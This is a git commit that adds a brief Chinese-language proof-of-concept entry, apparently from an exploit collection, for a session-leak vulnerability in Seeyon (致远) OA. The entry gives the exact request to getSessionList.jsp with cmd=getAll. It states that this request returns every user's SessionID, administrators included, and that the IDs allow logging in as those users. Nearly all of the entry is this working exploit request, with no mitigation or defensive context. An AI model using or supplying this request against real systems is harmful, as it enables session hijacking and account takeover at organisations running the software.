致远OA Session泄漏漏洞

2022-06-01 11:01:35 +08:00 · 2022-06-01 11:01:35 +08:00 · 9ab1f985d6
commit 9ab1f985d6
parent 1f4a52f8b7
1 changed files with 15 additions and 0 deletions
--- a/Session泄漏漏洞/致远OA
+++ b/Session泄漏漏洞/致远OA
@ -0,0 +1,15 @@
 # 致远OA Session泄漏漏洞
 ## 漏洞位置
 ```http request
 http://test.com/yyoa/ext/https/getSessionList.jsp
 ```
 > 当cmd参数为getAll时，便可获取到所有用户的SessionID利用泄露的SessionID即可登录该用户，包括管理员
 ## POC
 ```http request
 http://test.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll
 ```
 通过get 方式访问上述url 后，可以在返回包中看到session 信息